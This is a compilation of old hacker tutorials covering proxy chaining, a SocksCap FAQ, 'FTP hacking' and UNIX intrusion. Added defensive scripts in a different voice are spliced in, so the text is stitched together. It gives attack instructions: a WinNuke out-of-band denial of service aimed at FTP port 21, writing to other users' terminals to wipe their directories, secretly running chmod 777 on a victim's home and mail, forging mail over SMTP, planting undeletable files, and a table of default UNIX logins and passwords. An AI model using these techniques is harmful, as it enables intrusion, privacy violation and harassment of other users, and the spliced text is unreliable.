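What such an online checker does on the server side can be shown with a small script. The following is an added example, not the tamos.com or Proxys-4-All tool: it takes the CGI-style request variables a web server sees (the "Environmental Variables" the text mentions) and classifies the proxy as transparent (the real client address is forwarded in a header), anonymous (the server can tell a proxy is in use, but gets no client address) or none (direct connection). The header set and the sample environments, which use documentation-range addresses, are assumptions constructed for the example; it goes slightly beyond the text's two verdicts by separating the "anonymous" case.

```python
"""Added example: server-side proxy-disclosure check over CGI-style variables."""
import re
from typing import Dict, List, Tuple

# CGI spellings of headers that carry a forwarded client address.  Any
# address in these that differs from REMOTE_ADDR (the proxy itself) points
# back at the real client.
FORWARDING_VARS = ("HTTP_X_FORWARDED_FOR", "HTTP_FORWARDED",
                   "HTTP_CLIENT_IP", "HTTP_X_REAL_IP")
# Via only announces that a proxy was traversed; it carries no client address.
PROXY_MARKER_VARS = FORWARDING_VARS + ("HTTP_VIA",)

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def revealed_addresses(env: Dict[str, str]) -> List[str]:
    """Addresses found in forwarding headers, other than the proxy's own REMOTE_ADDR."""
    remote = env.get("REMOTE_ADDR", "")
    found: List[str] = []
    for var in FORWARDING_VARS:
        for ip in IPV4.findall(env.get(var, "")):
            if ip != remote and ip not in found:
                found.append(ip)
    return found


def classify_proxy(env: Dict[str, str]) -> Tuple[str, List[str]]:
    """Return (verdict, revealed addresses) in the spirit of the page's online test."""
    leaks = revealed_addresses(env)
    if leaks:
        return "transparent", leaks          # "Proxy server is detected!"
    if any(var in env for var in PROXY_MARKER_VARS):
        return "anonymous", []               # proxy visible, client hidden
    return "none", []                        # "Proxy server is not detected"


# Constructed sample environments (documentation-range addresses, not real hosts).
TRANSPARENT = {"REMOTE_ADDR": "203.0.113.7",
               "HTTP_VIA": "1.1 some.proxy.com:8080",
               "HTTP_X_FORWARDED_FOR": "198.51.100.23, 10.0.0.5"}
ANONYMOUS = {"REMOTE_ADDR": "203.0.113.7",
             "HTTP_VIA": "1.1 some.proxy.com:8080"}
DIRECT = {"REMOTE_ADDR": "198.51.100.23"}

if __name__ == "__main__":
    for name, env in (("transparent", TRANSPARENT), ("anonymous", ANONYMOUS),
                      ("direct", DIRECT)):
        verdict, addrs = classify_proxy(env)
        print(f"{name:12s} -> {verdict:12s} revealed={addrs}")
```

The check deliberately treats every address in X-Forwarded-For as revealing, including a chained proxy's own internal address (10.0.0.5 above): any address the destination receives that is not the proxy's is information the user did not intend to hand over.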
Final Considerations
In spite of all of the above, use proxies only when it's necessary. Working via proxy servers slows down the data transfer rate and is an additional load on the network and the servers. Another important thing that is often forgotten by many people: use proxies for legal purposes. Hiding your identity is ok (at least in the free world) as long as you want to visit a site that offers, say, pornography. But if you use a proxy server for purchasing CDs or software with a bogus credit card number there is a good chance that you'll end up in prison, let alone the moral aspects. Remember, all the connections are logged, and if you violate the law you can be tracked down. The site administrator can check the logs and contact the proxy's administrator, who can in turn check his own logs and find your real IP address; then they both will contact your ISP, and your ISP keeps logs too ... Anyway, I hope you got it.
Specially for paranoiacs
Look, the different tools described above can be chained! For example you set up your browser to use Proxy A, and you know the addresses and port numbers of 2 more servers, Proxy B and Proxy C. The URL that you type should look something like this: http://proxyB:port/http://proxyC:port/http://www.whereyougo.com/ As a result you go to the site via 3 servers: A, B and C. One of them can be the Anonymizer. WARNING: Not all proxy servers allow chains like that. I won't answer your messages asking me why it doesn't work in your particular case!
Using SocksCap for anonymity in non HTTP applications (telnet, ftp, ICQ, RealPlayer, and so on)
What is SocksCap?
What is the current version?
What is the difference between SocksCap, SocksCap16, and SocksCap32?
Do I need to run SocksCap16, SocksCap32, or both?
Where do I get SocksCap?
Is SocksCap free? Is the source code available?
Will it work with all stacks and applications?
How do I know if it works with my stack and application?
What happens if I start SocksCap16 AFTER a WinSock application is already running?
What if I close SocksCap16 before closing a WinSock application?
Will I need to run ftp in PASV mode?
When I close SocksCap16 in Windows 95 or Windows for Workgroups, it tells me "Exiting SocksCap may cause some network connections to become unstable." I have already closed all the client applications.
Is SocksCap Y2K?
Can I use SocksCap32 with RealPlayer 5.0 and 6.0?
Can I use SocksCap32 with Internet Explorer 4.0 in desktop mode or on Windows98? What about Internet Explorer 5.0?
What do I enter for SOCKS server and port in SocksCap Setup?
--------------------------------------------------------------------------------
What is SocksCap?
SocksCap automatically enables Windows-based TCP and UDP networking client applications to traverse a SOCKS firewall. SocksCap intercepts the networking calls from WinSock applications and redirects them through the SOCKS server without any modification to the original applications or to the operating system software or drivers.
What is the current version?
The current version of SocksCap16 (16-bit) is 1.02. The current release version of SocksCap32 (32-bit) is 1.03. A beta version of SocksCap32 (Version 2, Beta 3) is also available.
What is the difference between SocksCap, SocksCap16, and SocksCap32?
SocksCap refers to the 16- and 32-bit versions. SocksCap16 is the 16-bit version. SocksCap32 is the 32-bit version.
Do I need to run SocksCap16, SocksCap32, or both?
For Windows 3.1 and Windows for Workgroups 3.11, run SocksCap16.
For Windows 95 and Windows 98, you need SocksCap32 for the 32-bit applications. If you are running 16-bit applications under Windows 95 or Windows 98, you need SocksCap16 for those applications. You can run SocksCap16 and SocksCap32 simultaneously under Windows 95 and Windows 98 to handle both 16- and 32-bit applications.
Under Windows NT, use SocksCap32 for 32-bit applications. SocksCap16 does not run under Windows NT.
Where do I get SocksCap?
SocksCap is available for download through the SOCKS Web site at: http://www.socks.nec.com/.
Is SocksCap free? Is the source code available?
The software is available freely through the SOCKS web site. It is NOT in the public domain. Use and distribution is restricted and subject to certain agreements. Please read the full copyright, license terms, and restrictions in the file named "LICENSE.TXT" or "COPYRIGH.TXT" in the distribution. Source code is not available.
Will it work with all stacks and applications?
SocksCap functions independently from the applications and the stack. It needs to make some assumptions about the application and the stack implementations. Therefore, it will not work with every application and every stack. NEC USA has only tested SocksCap32 with m*cro$oft's 32-bit stack.
How do I know if it works with my stack and application?
The best way to find out is to try it. You may refer to the scorecard of applications and stacks with which SocksCap users have reported success or failure. Download the list from the SocksCap section at http://www.socks.nec.com/. Volunteers provide the information in the scorecard. The list is not complete and quickly becomes outdated. We greatly appreciate your additions and updates to the scorecard.
What happens if I start SocksCap16 AFTER a WinSock application is already running?
Start SocksCap16 before other WinSock applications. If SocksCap16 sees a request come from an application run prior to starting SocksCap16, it attempts to make all connections directly for that application. Beware that the application may become unstable.
What if I close SocksCap16 before closing a WinSock application?
SocksCap16 must remain running until after you close all network applications. When you attempt to close SocksCap16 and there are still active connections, SocksCap16 displays a warning and gives you a chance to cancel the exit. This does not apply to SocksCap32.
Will I need to run ftp in PASV mode?
FTP may experience problems, depending on the application and stack. Try running without PASV. If that does not work, try PASV.
When I close SocksCap16 in Windows 95 or Windows for Workgroups, it tells me "Exiting SocksCap may cause some network connections to become unstable." I have already closed all the client applications.
SocksCap16 notices that the "WSASRV" process is still running. Add "WSASRV" to the Direct Applications list in the SocksCap16 setup dialog.
Is SocksCap Y2K?
All dates and times in SocksCap16 and SocksCap32 are manipulated using structures from the operating system. As long as the OS and libraries are Y2K (year 2000 compliant), SocksCap should not have any problems.
Can I use SocksCap32 with RealPlayer 5.0 and 6.0?
Yes, but you need to configure RealPlayer so that it does not start up in the system tray. To do this in RealPlayer 5.0, select Preferences in the View menu. Click on the Advanced tab. Clear the check box for "Allow RealPlayer to run in the system tray." In RealPlayer 6.0, select Preferences in the Options menu. Under the General tab, clear the check box for "Allow SmartStart to run in the system tray."
Can I use SocksCap32 with Internet Explorer 4.0 in desktop mode or on Windows 98? What about Internet Explorer 5.0?
Although SocksCap32 will not socksify your entire desktop, it is possible to browse with Internet Explorer 4.0 in desktop mode or on Windows 98 with SocksCap32. Select Internet Options in Internet Explorer's View menu. Under the Advanced tab, check the "Browse in a new process" box. Then open an individual Internet Explorer process by starting it from SocksCap32.
For Internet Explorer 5.0, select Internet Options in Internet Explorer's Tools menu. Under the Advanced tab, check the "Launch browser windows in a separate process" box. Under the Connections tab, click the LAN Settings button. Clear check box for "Automatically detect settings."
What do I enter for SOCKS server and port in SocksCap Setup?
Enter the address and port of the SOCKS server you need to traverse. If you are not sure what those are, contact your ISP, network administrator, or firewall administrator for your site or consult a list 1080.htm.
--------------------------------------------------------------------------------
FTP-Hacking
What Is FTP and What Is It Good For?
------------------------------------
The word FTP (see footnote 1 below) stands for File Transfer Protocol(1).
FTP servers will let you both download (retrieve a file from the server) and upload (send a file to the server) files with great ease (if you have permission to do so).
You browse through a remote FTP site the same way you browse through your own computer's files and directories (of course, you don't have read and/or write access to every file on the system, and some files you can't even see).
FTP Commands
------------
The following are several basic FTP commands. To communicate with FTP daemons(7), connect to port(2) 21 and then use the following commands (see footnote 2 below) to communicate with the FTP server:
cd change directory (on the server)
lcd change local directory (when sending a file, the path(4) of the specified file will be the path you specify on lcd)
dir,ls directory listing
binary change mode to binary transfer
get retrieve a file
mget retrieve many files
put send a file
mput send many files
pwd print working directory on the server
Footnotes
+++++++++
1. For thousands of computer-related acronyms and abbreviations head to blacksun.box.sk and download the file called acros.txt from the projects page.
2. If you don't feel like typing stupid commands, there are lots of FTP clients(5) that will do all the work for you, but fortunately some will still show you all the commands they use so you'll be able to learn new commands.
You can download FTP clients for every Operating System from TUCOWS. Simply go to the nearest TUCOWS mirror site(3) or go directly to www.tucows.com.
FTP Hacking
-----------
Since there are so many FTP holes for so many FTP server programs and so many Operating Systems, I decided that the best way is simply to explain to you how to find information about security holes by yourself.
I will also introduce several interesting FTP security holes near the end of this section.
To find FTP exploits, try searching the following websites (or join the BugTraq mailing list at www.securityfocus.com):
CERT (Computer Emergency Response Team) - http://cert.org
X-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.pl
Packet Storm - packetstorm.genocide2600.com
BugTraq Archives - http://www.securityfocus.com/level2/bottom.html?go=search
Fyodor's Exploit World - http://www.insecure.org/sploits.html
Spikeman's Denial Of Service Website (for DoS(9) attacks against FTP servers) - http://www.genocide2600.com/~spikeman/
RootShell - http://www.rootshell.com
Slashdot - http://www.slashdot.org
Data - http://www.hideaway.net/data.html
After you get to one of the search sites listed above (I recommend the BugTraq Archives) search for the keywords you want.
For example: you find out(5) that your target is using this OS with this FTP server and this Webserver program etc'. Try combining all of those pieces of information and I'm sure you'll find the holes that fit you the most.
You can also try searching holes on your own computer.
Speaking about holes, we will explain about many security holes on the upcoming Sendmail tutorial (see blacksun.box.sk).
Now, for several selected FTP holes.
Selected FTP Holes
******************
The following FTP holes aren't new or extraordinary or incredibly fantastic or anything of that sort of matter. They're just good for learning.
I picked some interesting FTP holes and wrote a small explanation about them just to get the newbies started.
Note: the sites I got these from aren't "evil hacking sites". These explanations are called advisories and they are meant to be used by people who want to fix bugs on their systems. Whether you use them for that purpose or others is none of our business.
1) Some FTP daemons allow a premature PASV command, which can cause some FTP daemons to crash with a core dump(9). FTP core dumps can be used to salvage encrypted passwords, bypassing any shadow password scheme.
It is not known exactly which servers are immune to this and which are not, and the only workaround right now is to get a newer FTP server program.
Also see http://www.genocide2600.com/~spikeman/bisonware3.html for a DoS(9) attack against BisonWare FTP Server 3.5 similar to this hole.
2) FTP Bounce Attack (too long, see http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425 (From BugTraq))
3) Local bug in FTP Daemon (too long, see http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1345 (From BugTraq))
4) (Quoted in part from BugTraq) Impact: Anybody from outside can shutdown your pc ftp server. And if u are under win3.1 the system will crash.
Program: WinQVT/NET
Version: All versions.. 16 and 32 bits
Solution.. dont use it or upgrade
Exploit: Just Send a OOB (Out of Band) to port 21,
Exploit for dummies: Take any winnuke, start it, and when u find a "139" change it to "21" instead.
OK, I know this is stupid....... :P. But maybe somebody will need it.. who knows...
Note: A patched version of NT 4.0 isn't vulnerable to this running MS's FTP server. I haven't had a chance to test an unpatched server, but IIRC, I did check the FTP port when the OOB problem was first reported and it didn't cause a crash.
Newbies Corner
--------------
1. Protocol - a set of rules and regulations, similar to a language. When two computers know the same protocol, they can use it to communicate with each other.
2. Port - (for the more technical explanation of what ports are, see the end of this explanation) ports are like holes that enable things (data, in this case) to come in or out of them.
There are physical ports and software ports on your computer. Physical ports are those slots on the back of your computer, your monitor etc'. Now, software ports are used when connecting to other computers.
For example: I just bought a new computer and I want to turn it into a webserver (I want to enable people to access selected web pages, pictures, cgi and java scripts or applets, programs etc' that are located on my computer). In order for that to happen, I need to install webserver software.
The webserver software opens a port on my computer and names it port 80. Then it listens to incoming connections on that port.
When someone starts his Internet browser (Netscape, Lynx, Microsoft Explorer etc') and surfs to my website, his browser connects to my computer on port 80 and then sends HTTP commands that my webserver program can understand into it.
My webserver program quickly picks up the incoming data and then sends it back into a port that the surfer's browser opened on the surfer's computer. The browser will listen on that port and wait for the data (the HTML page, the picture, the program etc') to come in through it.
There are different ports for different services (we'll get to that) so data won't mix up. Imagine your browser getting data your FTP client was supposed to get.
I hope you got the main idea of what a port is.
Now, there are three kinds of ports: well-known ports, registered ports and dynamic/private ports.
The well-known ports are those from 0 through 1023. These are default ports for several services (a webserver is a service because it listens for connections from remote computers and then sends something back). For example: the default port for webservers is 80. Otherwise, how would your browser know which port it has to access?
Now, the registered ports are those from 1024 through 49151. These ports are reserved for several programs. For example: ICQ (www.icq.com) reserves a port and listens to incoming messages on it.
The dynamic and/or private ports are those from 49152 through 65535, and can be used by anyone for any given purpose.
"Techy Explanation" - To grant simultaneous access to the TCP module, TCP provides a user interface called a port.
Ports are used by the kernel to identify network processes. These are strictly transport layer entities (that is to say that IP could care less about them).
Together with an IP address, a TCP port provides an endpoint for network communications.
In fact, at any given moment *all* Internet connections can be described by 4 numbers: the source IP address and source port and the destination IP address and destination port.
Servers are bound to 'well-known' ports so that they may be located on a standard port on different systems.
For example, the telnet daemon sits on TCP port 23, the FTP daemon sits on TCP port 21, the rlogin daemon sits on TCP port 513 etc'.
Important note about well-known ports: services (daemons waiting for incoming connections that serve people in some way) on these ports can only be run by root, so inferior users won't mess with important ports.
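The "Techy Explanation" above can be made concrete with a small script. This is an added example, not part of the tutorial: it parses constructed connection records into the four numbers the text says identify every connection, counts distinct connections per listening port, and classifies port numbers into the three ranges given above. The record format ("src_ip:src_port -> dst_ip:dst_port") and the sample lines, which use documentation-range addresses, are assumptions made for the example.

```python
"""Added example: the (src ip, src port, dst ip, dst port) model of a connection."""
from collections import Counter
from typing import Dict, List, NamedTuple


class Connection(NamedTuple):
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def port_class(port: int) -> str:
    """The three IANA ranges exactly as the text gives them."""
    if not 0 <= port <= 65535:
        raise ValueError(f"not a TCP/UDP port: {port}")
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic/private"


def needs_root_to_bind(port: int) -> bool:
    """On traditional UNIX only root may listen on a well-known port."""
    return port_class(port) == "well-known"


def parse_connection(record: str) -> Connection:
    """Parse one constructed 'src_ip:src_port -> dst_ip:dst_port' line."""
    src, dst = (part.strip() for part in record.split("->"))
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return Connection(src_ip, int(src_port), dst_ip, int(dst_port))


def distinct_connections(records: List[str]) -> Dict[Connection, int]:
    """Records per 4-tuple: lines sharing all four numbers are the same connection."""
    return Counter(parse_connection(r) for r in records)


def connections_per_service(records: List[str]) -> Dict[int, int]:
    """Distinct connections handled by each listening (destination) port."""
    return Counter(conn.dst_port for conn in distinct_connections(records))


# Constructed sample: one client opens two connections to the web server
# (same addresses, different source ports), another client uses FTP.
SAMPLE = [
    "198.51.100.23:51032 -> 203.0.113.10:80",
    "198.51.100.23:51033 -> 203.0.113.10:80",
    "198.51.100.23:51032 -> 203.0.113.10:80",   # repeat of the first line
    "192.0.2.44:49160 -> 203.0.113.10:21",
]

if __name__ == "__main__":
    for conn in distinct_connections(SAMPLE):
        print(conn, port_class(conn.src_port), "->", port_class(conn.dst_port))
    print(dict(connections_per_service(SAMPLE)))
```

Note that the two web connections from 198.51.100.23 differ only in source port, which is exactly why the client side picks a fresh port from the dynamic or registered range for each connection while the server keeps the one well-known port.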
3. Mirror site - a website which is an exact copy of the original website which is hosted by a different server.
Mirror sites can be used to speed up downloads/uploads. For example: instead of downloading/uploading from/to the main tucows webserver, located somewhere distantly from my home, I can simply do it from one of their Israeli mirrors (mirror site located in Israel, my country) and that way the downloads/uploads would go faster.
4. Path - UNIX example: if a file is located at /etc/passwd, the file's path would be /etc.
DOS/Windows example: if a file is located at c:\windows\win.exe, the file's path would be c:\windows.
There are two kinds of paths: a complete path and a relative path.
Complete path on DOS/Windows: if the file is located on c:\program files\quickview plus\ then this is the file's complete path.
Complete path on UNIX: if the file is located at /usr/local/sbin then this is the file's complete path.
Relative path on DOS/Windows: if the current directory (the directory you are on at the moment) is c:\windows and the target file is located at c:\windows\temp then the relative path to this file is temp.
Relative path on UNIX: if the current directory is /usr/nobody and the file is located at /usr/nobody/public_html/cgi-bin then the file's relative path is public_html/cgi-bin.
5. Client / Server programs - A client program is a program that uses a resource offered by another program/computer.
A server program is a program that supplies resources to client programs.
Example: Client=Netscape Navigator. Server=Apache version 1.6.6 (a webserver, meaning a program that lets people who use Internet browsers to download specific web pages, pictures, files etc' from the computer it is installed on).
6. How to find out information about remote hosts - the best way to find out information is to look at daemon(6) banners. Daemon banners are small pieces of information some daemons return when connected to, in order for the remote machine (the one connecting to the daemon) to know how to interact with them better.
Try connecting to port 80 (webserver) and sending some commands like get and then looking at the banner. You may also try Sendmail (see next tutorial) on port 25, Telnet on port 23, FTP on port 21 or whatever you can come up with.
7. Daemon - a program that listens for incoming connections from remote machines on a specified port(2) and interacts with them.
8. Root - also referred to as superuser, because his permissions are endless. His UID (User ID number, an identification number every user on a UNIX system has) and GID (Group ID. You can create groups and give them several permissions. For example: everyone from the accounting department can read and execute all the files in this directory, etc') are always 0 (except on very altered boxes).
Once you are root, you can do practically anything on a system.
Core Dump - when a program crashes it dumps all the core (all the info it handles that isn't saved on disk, meaning all of the program's data that is in RAM) into a temporary file.
9. DoS - Denial of Service. A nuke in dummies language. Some kind of an attack that causes the target computer to deny some/all kinds of services to the users of that computer (including remote users).
For example: Winnuke (also known as OOB), the simplest DoS in the world.
(Taken from Spikeman's DoS site) This denial of service program affects Windows clients by sending an "Out of Band" exception message to port 139, which does not know how to handle it. This is a standard listening port on Windows operating systems. Users of Win 3.11, Win95, and Win NT are vulnerable to this attack. This program is basically a nuisance program, but it is being widely circulated over the internet now. It has become a bother in chatrooms and on IRC. By using your IP# and sending OOB data to port 139, malicious users can disconnect you from the net, often leaving you with low resources and the blue tinted screen. Some of you may have been victims already. If this happens to you on Win 95, you will see a Windows fatal error message similar to the following:
Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.
This was called from 0028: in VxD NDIS(01) + 00000D7C.
Rebooting the comp should return it to normal state.
Patches ("fixes") For WinNuke (OOB)
-=-=-=-=-=-=-=-=-=-=-=-
Additional Information on WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp
Windows 95 Patches
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe (for Winsock 2.0*)
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to 95 patches before installing.
Which version of Winsock do you have on your Windows 95 PC?
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp
http://www.theargon.com/defense/nuke/index.html
Windows NT 4.0 Patch
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to Windows NT patches before installing.
More info on DoS attacks can be found at Spikeman's DoS site: http://www.genocide2600.com/~spikeman/main.html
* I do not know if it will work on newer versions of Winsock, so you'd better downgrade to Winsock 1.1 (the version that comes with Windows 95) by going to Control Panel, Network and removing TCP/IP and Dial Up Adapter(11) and then re-adding them (click add, choose protocol and in the company frame choose Microsoft and you'll find TCP/IP. For DUN do the same but choose adapter instead of protocol).
After you finish downgrading reupgrade to Winsock 2.0, apply the patch (Vipup20.exe) and then upgrade to newer versions of Winsock.
10. Flames - the action of flaming someone (send him angry mail about things he has done, opinions he has etc' which you do not agree with).
11. DUN - Dial Up Adapter. Basically it's the Windows program that dials to your ISP(12).
12. ISP - Internet Service Provider. A company that provides Internet services, such as Internet connectivity, web hosting, Email services etc'.
13. Distro - Distribution. Since UNIX is not a registered patent, trademark, copyrighted or whatever, there are many distributions (software packages) of it. Every distro has its own advantages and disadvantages (example: Redhat is the best for beginners).
HACKING COMMANDS
It is fun and often usefull to create a file that is owned
by someone else. On most systems with slack security ie 99% of
all UNIX systems, this is quite easily done. The chown command
will change any of your files to make someone else the owner.
Format is as follows:
chown ownername filelist
Where ownername is the new owner, and filelist is the list of
files to change. You must own the file which you are going to
change, unless you are a superuser....then u can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file. If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first! Once the
file is owned by someone else, you can't change anything about it!
---------------------------------------------------------------
Sometimes just seeing who is on the system is a challenge in
itself. The best way is to write your own version of who in C,
but if you can't do that then this may be of some help to you:
who followed by one or more of the following flags:
-b Displays time sys as last booted.
-H Precedes output with header.
-l Lists lines waiting for users to logon.
-q displays number of users logged on.
-t displays time sys clock was last changed.
-T displays the state field (a + indicates it is
possible to send to terminal, a - means u cannot)
-u Give a complete listing of those logged on.
**who -HTu is about the best choice for the average user**
##by the way, the list of users logged on is kept in the file
/etc/utmp. If you want to write your own personalised version of
who in C, you now know where to look!###
---------------------------------------------------------------
When a users state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go straight to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.
Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by 'cating' a string to a users screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are still
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using this technique you can wipe peoples directories or
anything. My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).
---------------------------------------------------------------
If you ever briefly get access to another persons account
eg. they leave the room to go to toilet or whatever, then simply
type the following:
chmod 777 $HOME
chmod 777 $MAIL
Then clear the screen so they dont see what you just typed.
Now you can go look at their directory, and their mail, and
you can even put mail in their mail file. (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!
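The trick above leaves a mode that an administrator can find quickly: a home directory or mail spool that anyone on the system may write to. The following is an added example, not part of the tutorial, of such a check. It builds a constructed tree of two home directories and two mail spools in a temporary directory (the paths under it are assumptions), then reports every entry whose mode grants write permission to "other", which is what chmod 777 on $HOME and $MAIL produces.

```python
"""Added example: audit home directories and mail spools for world-writable modes."""
import os
import stat
import tempfile
from typing import List, Tuple


def world_writable(path: str) -> bool:
    """True if 'other' has write permission on path (symlinks are not followed)."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit(paths: List[str]) -> List[Tuple[str, str]]:
    """Return (path, octal permission bits) for each existing path others may write to."""
    findings = []
    for p in paths:
        if os.path.lexists(p) and world_writable(p):
            findings.append((p, oct(stat.S_IMODE(os.lstat(p).st_mode))))
    return findings


def build_sample_tree(root: str) -> List[str]:
    """Constructed layout: two homes and two mail spools; bob's were left open."""
    layout = {"home/alice": (True, 0o750), "home/bob": (True, 0o777),
              "var/mail/alice": (False, 0o600), "var/mail/bob": (False, 0o666)}
    paths = []
    for rel, (is_dir, mode) in layout.items():
        p = os.path.join(root, rel)
        if is_dir:
            os.makedirs(p)
        else:
            os.makedirs(os.path.dirname(p), exist_ok=True)
            open(p, "w").close()
        os.chmod(p, mode)       # chmod ignores the umask, so the modes are exact
        paths.append(p)
    return paths


def run_audit() -> List[str]:
    """Build the sample tree in a temp dir; return the offending paths relative to it."""
    with tempfile.TemporaryDirectory() as root:
        paths = build_sample_tree(root)
        return [os.path.relpath(p, root) for p, _ in audit(paths)]


if __name__ == "__main__":
    for finding in run_audit():
        print("world-writable:", finding)
```

On a real system the same audit would be pointed at the entries of /home and the mail spool directory; reading the mode with lstat rather than following symlinks avoids being fooled by a link planted into a user's directory.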
---------------------------------------------------------------
Another way to send fake mail to people is to use the mail
server. This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspicious when
they receive it, but it will fool the average user!
type telnet
the following prompt will appear:
telnet>
now type :
open localhost 25
some crap will come up about the mail server..now type:
mail from: xxxxxx Put any name you want.
some more bullshit will come up. Now type:
rcpt to: xxxxxx Put the name of the person to receive mail here.
now type:
data
now you can type the letter...end it with a "."
type quit to exit once you are done.
-------------------------------------------------------------
Here's one for any experimenters out there...
It is possible to create files which simply cannot be deleted
from the standard shell. To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell. Try things like Ctrl-h (this is the
code for the delete key). Just a file with the name Ctrl-h would
not be deletable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back.....this is one of my
favourites..gets 'em every time!
The following script file is an example which will create a
file with the name Ctrl-h. You MUST type this file in using the
vi editor or similar.
*****If you are not very good with vi, type "man vi" and print the
help file...it even contains stuff that I find useful now and
then.*****
type the following in vi...
echo '' > 'a^h'
***NOTE...to get the ^h (this really means ctrl-h) from vi type:
Ctrl v
Ctrl h
The Ctrl v instructs vi to take the next character as an ASCII
character, and not to interpret it.
Change the access on the file you just created and now
execute it. It will create a file which looks like it is called
a, but try to delete it!..use wildcards if you really want to
delete it.
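From the administrator's side, a name like that needs two things: make the hidden byte visible, then act on the inode number instead of the name, so no wildcard is needed and nothing else can match by accident. The functions below are an added example and are not part of the original file; they assume a find that supports -mindepth, -maxdepth and -inum (GNU and BSD both do).

```sh
#!/bin/sh
# Added example: locate directory entries whose names hide control
# characters (the Ctrl-h trick described above) and remove one by inode.

# Print every entry under DIR whose name contains a control character.
# "sed -n l" escapes the name, so a backspace shows up as \b instead of
# erasing the previous character on the terminal.
list_control_char_names() {
    dir=$1
    # LC_ALL=C makes [[:cntrl:]] match the raw bytes 0x01-0x1F and 0x7F.
    find "$dir" -mindepth 1 -print | LC_ALL=C grep '[[:cntrl:]]' | LC_ALL=C sed -n l
}

# Print the inode number of every such entry directly under DIR, one per line.
inodes_of_control_char_names() {
    dir=$1
    find "$dir" -mindepth 1 -maxdepth 1 -print | LC_ALL=C grep '[[:cntrl:]]' |
    while IFS= read -r name; do
        ls -di -- "$name" | awk '{ print $1 }'
    done
}

# Delete the entry directly under DIR that has inode number INUM.
# No name is typed at all, so the control characters never matter.
remove_by_inode() {
    dir=$1; inum=$2
    find "$dir" -mindepth 1 -maxdepth 1 -inum "$inum" -exec rm -rf -- {} +
}
```

A typical session is list_control_char_names "$HOME" to see what is there, inodes_of_control_char_names "$HOME" to get the numbers, and remove_by_inode "$HOME" NUMBER for each one; "ls -b" or "cat -v" show the same escapes if you prefer them to sed.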
*> Title: Tutorial on hacking through a UNIX system
**
In the following file, all references made to the name Unix, may also be
substituted to the Xenix operating system.
Brief history: Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously. Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier. After about 2 years of developmental research, they produced
an operating system they called "Unix".
Sixties to Current: During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient. One of the systems they
put on the Unix system was called "Elmos". Through Elmos many tasks (i.e.
billing, and installation records) could be done by many people using the same
mainframe.
Note: Cosmos is accessed through the Elmos system.
Current: Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful). Microsoft, seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT's. Their result they called
Xenix (pronounced zee-nicks). Both Unix and Xenix can be easily installed
on IBM PC's and offer the same function (just 2 different vendors).
Note: Due to the many different versions of Unix (Berkeley Unix,
Bell System III, and System V the most popular) many commands
following may or may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.
How to tell if/if not you are on a Unix system: Unix systems are quite
common systems across the country. Their security appears as such:
Login; (or login;)
password:
When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lowercase. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson). Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is).
Password: is a 1-8 character password assigned by the sysop or chosen by the user.
Common default logins
--------------------------
login;     Password:
root       root, system, etc.
sys        sys, system
daemon     daemon
uucp       uucp
tty        tty
test       test
unix       unix
bin        bin
adm        adm
who        who
learn      learn
uuhost     uuhost
nuucp      nuucp
If you guess a login name and you are not asked for a password, and have
access to the system, then you have what is known as a non-gifted account.
If you guess a correct login and password, then you have a user account.
And, if you get the root p/w you have a "super-user" account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm
Once you are in the system, you will get a prompt. Common prompts are:
$
%
#
But can be just about anything the sysop or user wants it to be.
